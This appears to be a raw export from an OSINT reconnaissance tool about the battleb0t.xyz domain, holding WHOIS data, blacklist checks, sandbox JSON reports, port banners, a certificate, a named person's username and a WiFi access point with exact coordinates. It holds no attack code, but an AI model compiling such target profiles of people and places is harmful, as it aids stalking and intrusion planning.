Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.147): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:53 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.96 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.13): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Username | No | Account Finder | 3 | 0 | 7 | 0 | None | baptiste.vauthey | baptiste vauthey |
| 2023-05-12 02:55:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3956"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f74_IE_EarlyTabStart_0x9f4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f74_ConnHashTable<3956>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f74_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f74_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_f74_IESQMMUTEX_0_519"\n "IsoScope_f74_IESQMMUTEX_0_303"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/431ebba2c34b4504bdef6a7212f4ea30 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /resources/431ebba2c34b4504bdef6a7212f4ea30 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/431ebba2c34b4504bdef6a7212f4ea30/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/431ebba2c34b4504bdef6a7212f4ea30/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/431ebba2c34b4504bdef6a7212f4ea30 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/431ebba2c34b4504bdef6a7212f4ea30 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /thumbnails/uploads/d8ae1b25aa854ca8ba94e43e11956f76.jpg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor-images.s3.amazonaws.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /thumbnails/uploads/d8ae1b25aa854ca8ba94e43e11956f76.jpg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://lor.instructure.com/resources/431ebba2c34b4504bdef6a7212f4ea30\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor-images.s3.amazonaws.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': | 104.196.30.220 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Wed, 17 Jun 2020 20:01:33 GMT
accept-ranges: bytes
content-length: 163
date: <REDACTED>
server: LiteSpeed
| 87.248.157.102 |
| 2023-05-12 02:55:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://bouncefitness.precisiongroup.com.au/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_344_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_344_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_344_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_344_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_344_IE_EarlyTabStart_0xbac_Mutex"\n "IsoScope_344_ConnHashTable<836>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.166:80"\n "104.21.6.166:443"\n "142.250.189.202:443"\n "172.217.12.104:443"\n "172.217.164.99:443"\n "142.251.46.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2016 Twitter, Inc." (Indicator: "twitter")\n "<a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-37c2364" target="_blank">" (Indicator: "twitter")\n "<i class="fab fa-twitter"></i></a>" (Indicator: "twitter")\n "<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript>" (Indicator: "youtube")\n "<span class="elementor-screen-only">Twitter</span>" (Indicator: "twitter")\n "function Ey(a,b){var c=this;return b}Ey.O="internal.enableAutoEventOnScroll";var cc=fa(["data-gtm-yt-inspected-"]),Fy=["www.youtube.com","www.youtube-nocookie.com"],Gy,Hy=!1;" (Indicator: "youtube")\n "function Ry(a,b){var c=this;return b}Ry.O="internal.enableAutoEventOnYouTubeActivity";var Sy;function Ty(a){var b=!1;return b}Ty.O="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},Q(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Qh.ka+"&cx=c";cs()&&(f+="&sign="+Qh.ue);var g=fi||hi?bs(b,f):void 0;g||(g=Po("https://","http://",Qh.Jd+f));Rl().destination[a]={state:1,context:c};mc(g)}};function ds(){if(vl()){return!0}return!1};var gs=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),hs={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},is={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc-_1_.woff" has type "Web Open Font Format TrueType length 20544 version 1.1"- [targetUID: N/A]\n "~DFAE12B4DD5D9EF57E.TMP" has type "data"- Location: [%TEMP%\\~DFAE12B4DD5D9EF57E.TMP]- [targetUID: 00000000-00000836]\n "lazyload.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "548YBEKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\548YBEKT.txt]- [targetUID: 00000000-00002848]\n "solid.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "P8ST09HS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P8ST09HS.txt]- [targetUID: 00000000-00000836]\n "style.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "preloaded-elements-handlers.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "webpack.runtime.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "frontend-modules.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_17DA973C-BEDC-11ED-8783-080027090D53_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "animations.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "waypoints.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "post-1477_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "wp-polyfill.min_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "bounce_logo_2_.png" has type "PNG image data 264 x 130 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "swiper.min_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "flexslider_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\ufffd\ufffd3>q\ufffd\ufffd[>\ufffd\ufffdd\ufffd*CgY\ufffdI\u043b\ufffd\xb9*\ufffdS\ufffdS\ufffd=\ufffd:\ufffdw\ufffdb/~\ufffd\ufffd\ufffd\ufffd?<<\ufffd{\ufffdT \ufffd\ufffdM\ufffdZ0\ufffd\ufffd\ufffdF\ufffd,\ufffdU\ufffd]\ufffd\ufffdtll\ufffdM\ufffd\ufffd[\ufffd\ufffd\u06be\ufffd\ufffd\ufffddz\ufffd\ufffd;\ufffd7\ufffd\ufffdN\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffdn#\ufffd\ufffdN>@)mN\ufffd?>\ufffd\ufffd\ufffd\u0785R\ufffd\ufffd`\uac7e\ufffdQ\ufffd$z/\ufffd2\ufffd\ufffdx\ufffdM\ufffdG\ufffdk\ufffdf6Ip\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdg\ufffd\ufffdnX4d\ufffd\ufffd\ufffde.0.\ufffd\ufffd\ufffd!/\ufffd\ufffd\ufffd\ufffd^\ufffd=z\ufffd5\ufffd\ufffd\ufffd\ufffd\'\ufffdhCh\ufffd7\ufffd\u0290\ufffd\ufffd\ufffd\ufffdj\ufffd:\u0760\ufffd\u059eUP?\ufffd\ufffdU\ufffdH+h\ueb420\ufffd\ufffd\ufffd\ufffd\ufffd[\ufffdh\ufffd3D\ufffd\ufffd*\ufffdS\ufffdzWAD7!\ufffd>\ufffdd\ufffdBhm\ufffd{fK\ufffdz\ufffd\ufffd"\n Pattern match: "T.HZ/1\ufffd\ufffd\ufffd\ufffd\ufffdb\u02ca\ufffd1"\n Pattern match: "https://twitter.com/intent/tweet?text={text"\n Pattern match: "https://+a+.google-analytics.com/g/collect},IA=function(){var"\n Pattern match: "http://www.w3.org/2000/svg,svg"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://getbootstrap.com"\n Pattern match: "https://fontawesome.com"\n Pattern match: "http://api.jqueryui.com/position/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://jqueryui.com"\n Pattern match: "http://swiperjs.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://jqueryui.com*"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css"\n Pattern match: "https://wp-rocket.me"\n Pattern match: "https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto%20Slab%3A100%2C100italic%2C200%2C200it"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/my-account/"\n Pattern match: "http://www.w3.org/2000/svg\'%20view | 104.21.6.166 |
| 2023-05-12 03:00:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.55): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:32 | Web Technology | No | Tool - WhatWeb | 0 | 0 | 3 | 0 | None | HTML5 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:53:10:73) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:15 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'MIIGKzCCBROgAwIBAgISBDdoex8mKc2kzJVS3+IKEm8TMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMTMxNTIzNTFaFw0yMzA1MTQxNTIzNTBaMB0xGzAZBgNVBAMTEm51a2UuYmF0dGxlYjB0Lnh5ejCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANkpWxhMHehZ69slkVQx7TgjqwqIV1zvDH7KymxxCwL9GT1q6JcodyUS5kGvDHTe61CQl5Th/eDbeDoKX65UqB+OQEba3sie+sjnOY4bn15g7EfER/l5JxdlJFTj6Yd3my38WbZpajVZcUlsP2izb/NHjZnYJko05b2YZBOcvC4y2fGCUzmpDlo+9EStJhnfAq4Kiu78mz592sr85+5oT8WM79x0Bul6R3FfU8dtCekfKoHjqkpKra6dJbn4wtMUVrR1kem+cw60fU3aZJV3bUN5c0mliiEBi0P3fms020PLGIaWDucaAlpP30LdiMNhTWvGxr8lW3b0DobdrdImqAsqmntCUMEskveSrnyx0xFPI6xU+Z6qkSt87RzBRhubPKAqsePiudB/BlfJHmMqiU3g/DQo7F9yFfIBgCLj0r9me3jzKjc20Bjn62JYGlM/SqrGBpMRLpvesiDFMDX3S96ZaItN8c9f4CmSodQlU/ZrjevIL6FI9pM9LSkck4qDbqjVQAeZ2bTt9C1bLJRpI4M/6x8gRer19loitXrq5pLvaTqG6X3MifVy2HUhOv3oOv3dFkM6IM+MHD9UYr5XtJH5H3tZu2mYrSFGaxQL8zLp80JM/j7q+FBNfONJMjHoc1Qq9eas+xdmoUF6BQTJU6u9YqJlPuTZv/NfYOa6PB+pAgMBAAGjggJOMIICSjAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNnPKDHmsFKms+WC8a/9SxaZz4eYMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB0GA1UdEQQWMBSCEm51a2UuYmF0dGxlYjB0Lnh5ejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2ALc++yTfnE26dfI5xbpY9Gxd/ELPep81xJ4dCYEl7bSZAAABhkuW/J8AAAQDAEcwRQIgdElH9CZHDUfimmav8ztGU51qAPzEW23pPWrlo6zYGCYCIQDw375oCKVzM7hBeMjxHZeJ0DxTmezTN6jxPE0tKm2qmQB3AHoyjFTYty22IOo44FIe6YQWcDIThU070ivBOlejUutSAAABhkuW/KwAAAQDAEgwRgIhAMXx1+xj79IrHYN7g1SNgvAJe4ZIoVKK15+apI/J5m2pAiEAv7raV5afdXcFlrTC+vYGZrWEqczxuoObgnXgYyRxNmcwDQYJKoZIhvcNAQELBQADggEBAIVjVNrS5xr77D86J/enZ/7IewGiZOTu7o7w